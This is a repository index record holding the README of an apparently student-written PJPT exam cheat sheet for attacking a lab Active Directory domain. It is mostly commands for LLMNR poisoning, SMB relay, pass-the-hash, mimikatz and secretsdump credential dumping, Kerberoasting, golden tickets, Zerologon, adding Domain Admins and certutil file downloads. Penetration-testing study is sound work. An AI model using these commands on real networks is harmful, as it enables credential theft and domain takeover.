{"id":18426653,"url":"https://github.com/dr4ks/pjpt_cheatsheet","last_synced_at":"2026-01-24T15:06:56.127Z","repository":{"id":189476915,"uuid":"678241705","full_name":"Dr4ks/PJPT_CheatSheet","owner":"Dr4ks","description":"This is CheatSheet which I used on PJPT exam to fully compromise Domain Controller by doing internal network penentration testing.","archived":false,"fork":false,"pushed_at":"2023-08-20T09:35:36.000Z","size":550,"stargazers_count":72,"open_issues_count":0,"forks_count":10,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-04-13T20:04:14.085Z","etag":null,"topics":["active-directory","ad","asrep-roasting","cheatsheet","dc","dns","domain-controller","internal-network-pentesting","kerberoasting","kerberos","kerberos-authentication","ldap","pentesting","pentesting-methodology","pjpt","pjpt-cheatsheet","pjpt-exam","security-checklist","tcm-security"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Dr4ks.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2023-08-14T05:05:40.000Z","updated_at":"2025-04-07T13:35:24.000Z","dependencies_parsed_at":"2023-08-20T10:55:55.327Z","dependency_job_id":"7d035bed-4265-4133-9cf5-ef8e8dd7b17e","html_url":"https://github.com/Dr4ks/PJPT_CheatSheet","commit_stats":null,"previous_names":["dr4ks/pjpt_cheatsheet"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Dr4ks/PJPT_CheatSheet","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Dr4ks%2FPJPT_CheatSheet","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Dr4ks%2FPJPT_CheatSheet/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Dr4ks%2FPJPT_CheatSheet/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Dr4ks%2FPJPT_CheatSheet/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Dr4ks","download_url":"https://codeload.github.com/Dr4ks/PJPT_CheatSheet/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Dr4ks%2FPJPT_CheatSheet/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28730309,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-24T10:24:43.181Z","status":"ssl_error","status_checked_at":"2026-01-24T10:24:36.112Z","response_time":89,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["active-directory","ad","asrep-roasting","cheatsheet","dc","dns","domain-controller","internal-network-pentesting","kerberoasting","kerberos","kerberos-authentication","ldap","pentesting","pentesting-methodology","pjpt","pjpt-cheatsheet","pjpt-exam","security-checklist","tcm-security"],"created_at":"2024-11-06T05:08:28.243Z","updated_at":"2026-01-24T15:06:56.108Z","avatar_url":"https://github.com/Dr4ks.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# Hi, I'm Dr4ks! 👋\n\n## 🚀 About Me\nI'm a Cyber Security student.\n\n## 🔗 Links\n[![linkedin](https://img.shields.io/badge/linkedin-0A66C2?style=for-the-badge\u0026logo=linkedin\u0026logoColor=white)](https://www.linkedin.com/in/sahib-humbatzada-42b082223/)\n[![hackerrank](https://img.shields.io/badge/HackerRank-2EC866?style=for-the-badge\u0026logo=hackerrank\u0026logoColor=white)](https://www.hackerrank.com/Dr4ks)\n[![tryhackme](https://img.shields.io/badge/tryhackme-1DB954?style=for-the-badge\u0026logo=tryhackme\u0026logoColor=white)](https://tryhackme.com/p/Dr4ks)\n[![github](https://img.shields.io/badge/GitHub-100000?style=for-the-badge\u0026logo=github\u0026logoColor=white)](https://github.com/Dr4ks)\n\n\n## Content\n- [Recon](#recon)\n- [Enumeration](#enumeration)\n- [Initial attacks for Active Directory](#initial-attacks-for-active-directory)\n- [Post Compromise Enumeration for Active Directory](#post-compromise-enumeration-for-active-directory)\n\n- [Post Compromise Attacks for Active Directory](#post-compromise-attacks-for-active-directory)\n- [After compromising Domain](#after-compromising-domain)\n- [Additional AD attacks](#additional-ad-attacks)\n- [AD Case Studies](#ad-case-studies)\n- [Result](#result)\n\n# Recon\nIntroduction is here!\n\n![image1](images/image1.png)\n\nDiscovering email addresses(links)=\u003e\n\nhttps://hunter.io/\n\nhttps://phonebook.cz/\n\nhttps://www.voilanorbert.com/\n\nhttps://tools.emailhippo.com/\n\nhttps://email-checker.net/\n\n\nGathering breached credentials=\u003e\n\nhttps://github.com/hmaverickadams/breach-parse\n\nhttps://dehashed.com/\n\nHunting Subdomains=\u003e\n\nhttps://crt.sh/\n\n```bash\nsublist3r -d tesla.com -t 100\n```\n\nIdentifying website technologies=\u003e\n\nhttps://builtwith.com/\n\nwappanalyzer tool\n\n```bash\nwhatweb https://tesla.com\n```\n\nGoogle Dorking=\u003e\n\nsite:tesla.com  (returns results from only tesla.com website)\n\n-www (remove results which have 'www' values)\n\nfiletype:docx  (return results which filetype is docx.)\n\n# Enumeration\n```bash\narp-scan -l  \n```\n\n```bash\nnetdiscover -r 192.168.57.0/24\n```\n\n```bash\nnmap -T4 -p- -sS -A 192.168.57.134\n```\n\n# Initial attacks for Active Directory\n\nLLMNR Poisoning=\u003e\n![LLMNR](images/image2.png)\n\nHow to do=\u003e\n\n1.Open responder:\n```bash\nresponder -I tun0 -dwPv \n```\n\n2.Write your ip as this format to search on File Explorer\n```bash \n//attacker_ip\n```\n\n3.Responder will give you result,you will crack in this way.\n```bash\nhashcat -m 5600 hash.txt /usr/share/wordlists  rockyou.txt\n```\n\nSMB Relay=\u003e\nFor this attack works, SMB Signing must be **disabled**.\n\n1.Checking SMB signing:\n```bash\nnmap --script=smb2-security-mode.nse -p445 10.0.0.0/24\n```\n\n2.Open responder:\n```bash\nresponder -I tun0 -dwPv \n```\n\n3.Make configurations for responder tool here, '/etc/responder/Responder.conf'\nYou need to **disable** (make OFF) HTTP and SMB\n\n4.Set up your relay\n```bash\nsudo ntlmrelayx.py -tf targets.txt -smb2support\n```\n\n5.Write your ip as this format to search on File Explorer\n```bash \n//attacker_ip\n```\n\nReminder! Run commands via ntlmrelayx.py\n```bash\nsudo ntlmrelayx.py -tf targets.txt -smb2support -c \"whoami\"\n```\n\nGaining Shell Access=\u003e\n\nFirst Way:\nWe can use Metasploit for this.\n```bash\nuse exploit/windows/smb/psexec\nset SMBDomain MARVEL.local\nset SMBUser fcastle\nset SMBPass Password1\n```\n\nSecond Way:\nWe can use psexec.py to access\n```bash\npsexec.py marver.local/fcastle:'Password1'@10.0.0.25\n```\n\nThird way:\nAgain, we use psexec.py to access , but with user's hashes (LM:NT), it is like Pass-The-Hash attack\n```bash\npsexec.py administrator@10.0.0.25 --hashes [LM-HASH]:[NTLM-HASH]\n```\n\nFourth Way:\nIf psexec.py doesn't work for third way,\nyou need to use **wmiexec.py** as below.\n```bash\nwmiexec.py administrator@192.168.138.137 --hashes [LM-HASH]:[NTLM-HASH]\n```\n\n\nIPv6 attacks=\u003e\n\n1.Open **mitm6** for target domain\n```bash\nsudo mitm6 -d marvel.local\n```\n\n2.At the same time, open **ntlmrelayx.py**\n```bash\nntlmrelayx.py -6 -t ldaps://192.168.138.136 -wh fakewpad.marvel.local -l lootme\n```\n\n3.You will get results like this from **'/home/kali/lootme/domain_computers.html'**\n\n\n# Post Compromise Enumeration for Active Directory\n\nDomain Enumeration with **ldapdomaindump**=\u003e\n1.Run below command\n```bash\nsudo ldapdomaindump ldaps://192.168.138.136 -u 'MARVEL\\fcastle\\' -p Password1\n```\n2.Then do **ls** command to see all things.\n\nDomain Enumeration with **bloodhound-python**=\u003e\n1.Run below command\n**-ns option** means your DC(Domain Controller's IP)\n\n```bash\nsudo bloodhound-python -d MARVEL.local -u fcastle -p Password1 -ns [DC-IP] -c all \n```\n\n2.Then do **ls** command to see all things.\nIf you want to see via GUI, you just upload .json file into Bloodhound.\n\nDomain Enumeration with **Plumhound**=\u003e\n\nWhen you do below command, **Bloodhound** should be up!\n1.\n```bash\nsudo python3 PlumHound.py --easy -p [YOUR_PASS]\n```\n\n2.Another thing for all.\n```bash\nsudo python3 PlumHound.py -x tasks/default.tasks -p [YOUR_PASS]\n```\n\n3.Finally, by opening Firefox, you can look at results.\n\n# Post Compromise Attacks for Active Directory\n\nPass the Password=\u003e\n```bash\ncrackmapexec smb 10.0.0.0/24 -u fcastle -d MARVEL.local -p Password1\n```\n\nGrab some local hashes=\u003e\n\nFirst Way:\n\nFor this, we can use meterpreter by using hashdump.\n```bash\nuse windows/smb/psexec\nrun\nhasdump #you will get hashes of users.\n```\n\nSecond Way:\n```bash\nsecretsdump.py MARVEL.local/fcastle:Password1@10.0.0.25\n```\n\nThird Way:\n```bash\nsecretsdump.py administrator:@192.168.138.138 --hashes [LM-HASH]:[NT-HASH]\n```\n\nPass the Hash=\u003e\n```bash\ncrackmapexec smb 10.0.0.0/24 -u administrator -H [USER-HASH]\n```\n\nReminder! Cheatsheet of crackmapexec\n\n--local-auth : authenticate locally to each target\n\n--sam : dump SAM hashes from target systems.\n\n--lsa : dump LSA secrets from target systems.\n\n--shares: enumerate shares and access\n\n-L : List available modules for each protocol\n\n-M : Specify module\n\nHow to use **available** module for crackmapexec?\n```bash\ncrackmapexec smb 192.168.138.0/24 -u administrator -H [USER-HASH] --local-auth -M lsassy\n```\n\n**Reminder**! If you want to access database of crackmapexec, you just need to use **cmedb** command\n\n\n\nKerberoasting=\u003e\n\n1.Get SPNs \n```bash\npython GetUserSPNs.py MARVEL.local/fcastle:Password1 -dc-ip [DC_IP] -request\n```\n\n2.Crack the hash\n```bash\nhashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt\n```\n\nToken Impersonation=\u003e\n\nTo see all tickets on meterpreter\n```bash\nmeterpreter \u003e list_tokens -u\n```\n\nTo impersonate user:\n```bash\nmeterpreter \u003e impersonate_token MARVEL\\\\administrator\n```\n\nTo dump hashes:\n```bash\nmimikatz(powershell) # privilege::debug\nmimikatz(powershell) # LSADump::LSA /patch\n```\n\nHow to add a new user:\n```powershell\nnet user /add hawkeye Password1@ /domain\n```\n\nHow to add user into group:\n```powershell\nnet group \"Domain Admins\" hawkeye /ADD /DOMAIN\n```\n\nGPP attack(cPassword attack)=\u003e\nSample Groups.xml file=\u003e\n![image3](images/image3.jpg)\n\nCracking password=\u003e\n![image4](images/image4.jpg)\n\n\nCredential Dumping with Mimikatz=\u003e\n\nMimikatz:https://github.com/gentilkiwi/mimikatz\n\nBelow command is must on Mimikatz!\n```bash\nmimikatz # privilege::debug\n```\n\nReminder! When you write module_name then put \"::\" then , clicking Tab, you can get **HELP**\n\n1.sekurlsa : This module is used to enumerate credentials.\nExample:\n```bash\nmimikatz # sekurlsa:logonPasswords\n```\n\n# After compromising Domain\n\nDumping NTDS.dit=\u003e\n```bash\nsecretsdump.py MARVEL.local/pparker:'Password2'@192.168.138.132 -just-dc-ntlm \n```\n\nGolden Ticket Attacks=\u003e\n\n1.First, we get NTLM hash ,SID and relative ID of krbtgt account from KDC\n```bash\nmimikatz # privilege::debug\nmimikatz # lsadump::lsa /inject /name:krbtgt\n```\n\n2.Then using above creds, we just create golden ticket.\n```bash\nkerberos::golden /User:Administrator /domain:marvel.local /sid:[SID_VALUE] /krbtgt:[KRBTGT_NTLM_HASH] /id:[RELATIVE_ID] /ptt\n```\n\n# Additional AD attacks\n\nCVE-2020-1472=\u003e This is Abusing **Zerologon**.\n\nURL=\u003ehttps://github.com/SecuraBV/CVE-2020-1472\n\nHow to do=\u003e\n\n1.We get Administrator hash from here\n```bash\nsecretsdump.py -just-dc MARVEL/HYDRA-DC\\$@192.168.138.132\n```\n\n2.Now ,we need to get 'plain_password_hex' by using hash in below format.\n```bash\nsecretsdump.py administrator@192.168.138.132 --hashes [LM:NTLM_HASH]\n```\n\n3.Now, we use script from Github as below\n```bash\npython3 restorepassword.py MARVEL/HYDRA-DC@HYDRA-DC -target-ip 192.168.138.132 -hexpass [HEX_VALUE]\n```\n\n\nCVE-2021-1675=\u003e This is **PrintNightmare**\n\nURL=https://github.com/cube0x0/CVE-2021-1675\n\nHow to check this=\u003e For this, we use rpcdump.py script\n```bash\nrpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'\n```\n\n# AD Case Studies\n\nCase 1: https://tcm-sec.com/pentest-tales-001-you-spent-how-much-on-security\nCase 2: https://tcm-sec.com/pentest-tales-002-digging-deep\n\n# Post Exploitation\n\nFile Transfers=\u003e\n\n1.Powershell for Windows\n```powershell\ncertutil.exe --urlcache -f http://10.10.10.10/file.txt file.txt\n```\n\n2.Open HTTP server to share files on directory\n```bash\npython3 -m http.server --bind [your_ip] [port]\n```\n\n# Result\n[Click me!](https://www.linkedin.com/posts/dr4ks_pjpt-tcmsecurity-activity-7096676619943034880-t1mH/)\n## Authors\n- [@dr4ks](https://www.github.com/Dr4ks)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdr4ks%2Fpjpt_cheatsheet","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdr4ks%2Fpjpt_cheatsheet","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdr4ks%2Fpjpt_cheatsheet/lists"}